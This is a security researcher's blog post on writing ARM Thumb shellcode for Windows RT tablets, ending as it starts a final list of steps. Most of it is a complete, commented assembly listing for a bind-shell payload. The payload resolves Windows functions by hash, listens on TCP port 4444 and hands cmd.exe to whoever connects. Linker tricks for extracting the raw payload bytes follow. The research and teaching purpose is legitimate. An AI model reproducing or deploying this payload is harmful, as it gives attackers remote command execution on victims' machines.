Windows RT ARMv7-based Shellcode Development

Recently, I've taken an interest in gaining code execution on my Surface RT tablet. I have found Windows RT to be rather enticing since Microsoft has made a concerted effort to prevent the execution of unsigned code. A couple weeks ago I discovered a way to gain arbitrary shellcode execution via PowerShell. I will have a separate blog post on that topic once I get a thumbs up from Microsoft. And for the record, I am aware of the awesome public Windows RT jailbreak.

Anyway, seeing as I'm already fairly comfortable writing x86 and x86_64 shellcode, I wanted to take on the challenge of writing ARMv7-based shellcode for Windows since no one else seems to be doing it publicly. Knowing that writing shellcode from scratch would have been rather painful and prone to error, I decided to write my payload in C and then modify the resulting assembly listing slightly in order to achieve a position independent payload. Here is the result (noting that this is merely a working proof-of-concept):

; PoC ARMv7-A Windows RT Bind Shell
; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200)
; Syntax: MASM
; Notes: In order for this to work properly, you have to call this payload
;        at baseaddress + 1 since it is thumb code.
;        This was built with armasm.exe from Visual Studio 2012

; Author: Matthew Graeber (@mattifestation)
; License: BSD 3-Clause

 AREA |.foo|, CODE, THUMB
 ; After linking, the resulting executable will only
 ; have a single section (with RX permissions) named .foo

 EXPORT main

main
 push        {r4,lr}  ; Preserve registers on the stack
 bl          ExecutePayload ; Execute bind shell function
 pop         {r4,pc}  ; Restore registers on the stack and return to caller


GetProcAddress
; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode
 push        {r1-r11,lr}  ; Preserve registers on the stack
 mov         r9,r0  ; Save the function hash in R9
 mrc         p15,#0,r3,c13,c0,#2 ; R3 = &TEB
 ldr         r3,[r3,#0x30] ; R3 = &PEB
 ldr         r3,[r3,#0xC] ; R3 = PEB->Ldr
 movs        r6,#0  ; R6 = 0
 ldr         r1,[r3,#0xC] ; R1 = Ldr->InLoadOrderModuleList
 ldr         r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
 ldr         r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
 ldr         r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
 str         r3,[sp]  ; Store BaseDllName.Length/MaximumLength on the stack
 cbz         r4,exit_failure ; If DllBase == 0, you've likely reached the end of the module list. Return 0.
 mov         r10,#0xD  ; R10 = ROR value (13)
 mov         r11,#0xD  ; R11 = ROR value (13)
get_module_hash     ; Improvement: Need to validate MaximumLength != 0
 ldrh        r5,[sp,#2]  ; BaseDllName.MaximumLength
 movs        r2,#0  ; i = 0
 cbz         r5,get_export_dir ; Reached the last char of BaseDllName
ror_module_char
 ldrsb       r3,[r7,r2]  ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i)
 rors        r0,r6,r10  ; Calculate the next portion of the module hash
 cmp         r3,#0x61  ; Is the character lower case?
 blt         notlowercase
 adds        r3,r3,r0  ; Add to the running hash value
 subs        r6,r3,#0x20  ; Convert character to upper case
 b           get_next_char
notlowercase
 adds        r6,r3,r0  ; Add to the running hash value
get_next_char
 adds        r2,#1  ; Move to the next character
 cmp         r2,r5  ; Reached the last character in the module name?
 bcc         ror_module_char ; If not, move on to the next character
get_export_dir
 ; At this point, the module hash has been calculated.
 ; Now begin calculating the function hash
 ldr         r3,[r4,#0x3C] ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS
 adds        r3,r3,r4  ; PIMAGE_NT_HEADERS
 ldr         r3,[r3,#0x78] ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point)
 cbz         r3,get_next_module ; Move to the next module if it doesn't have an export directory (i.e. most exe files)
 adds        r5,r3,r4  ; Calculate export dir virtual address
 ldr         r3,[r5,#0x20] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames
 ldr         r7,[r5,#0x18] ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames
 movs        r0,#0
 adds        r8,r3,r4  ; AddressOfNames VA
 cbz         r7,get_next_module ; Move on to the next module if there are no exported names
calc_func_hash
 ldr         r3,[r8],#4  ; R3 = Current name RVA
 movs        r2,#0
 adds        lr,r3,r4  ; lr = Current name VA
get_func_char
 ldrsb       r3,[lr]  ; Load char from the function name
 rors        r2,r2,r11  ; Calculate the next portion of the function hash
 adds        r2,r2,r3  ; Add to the running hash value
 ldrsb       r3,[lr],#1  ; Peek at the next char
 cmp         r3,#0  ; Are you at the end of the function string?
 bne         get_func_char ; If not, calculate hash for the next char.
 adds        r3,r2,r6  ; Add the module hash to the function hash
 cmp         r3,r9  ; Does the calulated hash match the hash provided?
 beq         get_func_addr
 adds        r0,#1
 cmp         r0,r7  ; Are there more functions to process?
 bcc         calc_func_hash
get_next_module
 ldr         r1,[r1]  ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink
 movs        r6,#0  ; Clear the function hash
 ; Improvement: The following portion is redundant
 ldr         r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
 ldr         r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
 ldr         r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
 cmp         r4,#0  ; DllBase == 0?
 str         r3,[sp]  ; Store BaseDllName.Length/MaximumLength on the stack
 bne         get_module_hash
exit_failure
 movs        r0,#0  ; Return 0 upon failure to find a matching hash
exit_success
 pop         {r1-r11,pc}  ; Restore stack and return to caller with the function address in R0
get_func_addr
 ldr         r3,[r5,#0x24] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
 add         r3,r3,r0,lsl #1
 ldrh        r2,[r3,r4]  ; R2 = Ordinal table index
 ldr         r3,[r5,#0x1C] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
 add         r3,r3,r2,lsl #2
 ldr         r3,[r3,r4]  ; Function RVA
 adds        r0,r3,r4  ; R0 = Function VA
 b           exit_success

ExecutePayload
 ; Improvement: None of the calls to GetProcAddress
 ;  validate that a valid address was actually returned
 ; Metasploit shellcode doesn't perform this validation either. :P
 push        {r4-r11,lr}  ; Preserve registers on the stack
 subw        sp,sp,#0x214 ; Allocate soace on the stack for local variables
 movs        r3,#0x44  ; sizeof(_PROCESS_INFORMATION)
 add         r2,sp,#0x38  ; R2 = &StartupInfo
 movs        r1,#0
init_mem1
 ; Improvement: I could just initialize everything on the stack to 0
 strb        r1,[r2],#1  ; Set current byte to 0
 subs        r3,#1
 bne         init_mem1
 movs        r3,#0x10  ; sizeof(_STARTUPINFOW)
 add         r2,sp,#0x28  ; R2 = &ProcessInformation
init_mem2
 strb        r1,[r2],#1  ; Set current byte to 0
 subs        r3,#1
 bne         init_mem2

 ldr         r0,HASH_LoadLibraryA
 bl          GetProcAddress
 mov         r3,r0
 adr         r0,module_name ; &"ws2_32.dll"
 blx         r3   ; LoadLibrary("ws2_32.dll");
 ldr         r0,HASH_WsaStartup
 bl          GetProcAddress
 mov         r4,r0
 ldr         r0,HASH_WsaSocketA
 bl          GetProcAddress
 mov         r5,r0
 ldr         r0,HASH_Bind
 bl          GetProcAddress
 mov         r6,r0
 ldr         r0,HASH_Listen
 bl          GetProcAddress
 mov         r7,r0
 ldr         r0,HASH_Accept
 bl          GetProcAddress
 mov         r8,r0
 ldr         r0,HASH_CloseSocket
 bl          GetProcAddress
 mov         r9,r0
 ldr         r0,HASH_CreateProcess
 bl          GetProcAddress
 mov         r10,r0
 ldr         r0,HASH_WaitForSingleObject
 bl          GetProcAddress
 mov         r11,r0
 mov         r0,#0x0202
 add         r1,sp,#0x80
 blx         r4   ; WSAStartup(MAKEWORD(2, 2), &WSAData);
 movs        r3,#0
 movs        r2,#0
 movs        r1,#1
 movs        r0,#2
 str         r3,[sp,#4]
 str         r3,[sp]
 blx         r5   ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
 movs        r3,#2  ; service.sin_family = AF_INET;
 strh        r3,[sp,#0x18]
 movs        r3,#0  ; service.sin_addr.s_addr = 0;
 str         r3,[sp,#0x1C]
 mov         r3,#0x5C11  ; service.sin_port = HTONS(4444);
 movs        r2,#0x10
 add         r1,sp,#0x18
 strh        r3,[sp,#0x1A]
 mov         r5,r0  ; WSASocketA returned socket (s)
 blx         r6   ; Bind( s, (SOCKADDR *) &service, sizeof(service) );
 movs        r1,#0
 mov         r0,r5
 blx         r7   ; Listen( s, 0 );
 movs        r2,#0
 movs        r1,#0
 mov         r0,r5
 blx         r8   ; AcceptedSocket = Accept( s, 0, 0 );
 mov         r4,r0
 mov         r0,r5
 blx         r9   ; CloseSocket( s ); Close the original socket
 mov         r3,#0x101  ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
 str         r3,[sp,#0x64]
 movs        r3,#0x44  ; StartupInfo.cb = 68;
 str         r3,[sp,#0x38]
 add         r3,sp,#0x28
 str         r3,[sp,#0x14]
 add         r3,sp,#0x38
 str         r3,[sp,#0x10]
 movs        r3,#0
 str         r3,[sp,#0xC]
 str         r3,[sp,#8]
 str         r3,[sp,#4]
 movs        r3,#1
 adr         r1,cmdline  ; &"cmd"
 str         r3,[sp]
 movs        r3,#0
 movs        r2,#0
 movs        r0,#0
 str         r4,[sp,#0x78] ; StartupInfo.hStdError = (HANDLE) AcceptedSocket;
 str         r4,[sp,#0x74] ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket;
 str         r4,[sp,#0x70] ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket;
 blx         r10   ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation );
 ldr         r0,[sp,#0x28]
 mvn         r1,#0
 blx         r11   ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE );
 addw        sp,sp,#0x214
 pop         {r4-r11,pc}

HASH_WaitForSingleObject
 DCD         0x601d8708
HASH_CreateProcess
 DCD         0x863fcc79
HASH_CloseSocket
 DCD         0x614d6e75
HASH_Accept
 DCD         0xe13bec74
HASH_Listen
 DCD         0xff38e9b7
HASH_Bind
 DCD         0x6737dbc2
HASH_WsaSocketA
 DCD         0xe0df0fea
HASH_WsaStartup
 DCD         0x006b8029
HASH_LoadLibraryA
 DCD         0x0726774c

cmdline
 DCB "cmd", 0x0

module_name
 DCB "ws2_32.dll", 0x0


 END

You may have noticed that this shellcode is written in MASM format, therefore, it can only be assembled using armasm.exe (the ARM equivalent of ml.exe). Unfortunately, armasm doesn't provide the option of outputting to a raw bin file. It will only emit an object (.obj) file. I wrote Get-ObjDump with the intent of pulling out raw payload bytes in mind but armasm doesn't apply relocations. This means that any calls to functions present in the payload won't be fixed up and it will crash upon executing.

So rather than writing my own linker, the natural choice was to leverage Microsoft's linker, link.exe. In theory, all I would need to do is call `link bindshell.obj` and pull out the raw bytes from the '.foo' section of the resulting binary. However, I ran into a couple issues in practice:

1. link.exe requires that you specify an entry point.

Solution: Easy. Provide the '/ENTRY:"main"' switch

2. Depending on the subsystem you choose, link.exe requires certain functions in the CRT to be present. For example, the following subsystems require the following entry point functions:

/SUBSYSTEM:CONSOLE - mainCRTStartup
/DLL - _DllMainCRTStartup
/SUBSYSTEM:WINDOWS - WinMainCRTStartup
/SUBSYSTEM:NATIVE - NtProcessStartup

Solution: Obviously, I don't care about the C runtime library in my shellcode. The solution I came up with was to specify EFI_APPLICATION as the subsystem since it doesn't require the CRT. In the end, I don't care about the type of PE file I output. I just need the linker to fix up relocations for me. I can take care of pulling out the bytes from the .foo section of the resulting executable. Fortunately, Get-PEHeader can rip raw bytes from a PE file.

 

Wrapping things up, here is the process of obtaining fully-functioning ARM-based Windows RT shellcode from end to end: